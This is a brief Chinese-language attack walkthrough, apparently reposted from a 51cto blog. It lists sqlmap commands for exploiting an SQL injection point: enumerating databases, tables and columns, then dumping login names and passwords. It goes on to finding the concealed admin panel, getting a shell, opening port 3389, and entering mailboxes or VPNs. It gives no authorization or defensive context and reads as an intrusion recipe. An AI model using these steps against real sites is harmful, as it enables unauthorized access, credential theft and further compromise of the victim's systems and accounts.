找到注入点
1、设置sqlmap -u 地址 --dbs --current-user,
2、设置sqlmap -u 地址 --tables猜解表名,或者--dbms mysql --tables
3、设置sqlmap -u 地址 -T uname(表名) --columns猜解列名
4、设置sqlmap -u 地址 -T uname(表名) -C login-name,pass,username(列名,用逗号分隔) --dump获取数据
5、获取登录账号和密码后,找到管理登录口,一般比较隐蔽,可以通过工具、联系我们角落、源文件等等获取
6、进入后台以后,再争取拿shell,3389端口打开,进入邮箱或VPN等等
原文:http://luzhiping.blog.51cto.com/9334832/1696165